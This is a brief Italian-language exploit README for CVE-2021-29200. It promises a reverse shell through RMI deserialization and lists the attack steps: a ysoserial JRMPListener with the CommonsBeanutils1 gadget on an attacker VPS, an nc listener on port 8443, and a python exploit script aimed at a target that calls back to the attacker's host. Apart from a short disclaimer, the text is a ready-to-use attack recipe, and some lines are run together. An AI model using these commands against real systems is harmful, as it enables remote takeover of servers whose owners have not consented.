
Exploit per CVE-2021-29200 che consente l'esecuzione remota di comandi tramite attacco di deserializzazione RMI con listener JRMP e consegna di payload reverse shell.
CVE-2021-29200 EXP può ottenere con successo una reverse shell
Questo articolo e lo strumento sono solo per la condivisione tecnica; è severamente vietato l'uso per scopi illegali. Qualsiasi conseguenza derivante da tale uso è a esclusivo carico dell'utente.
RMI sulla porta 9999 sul VPSjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
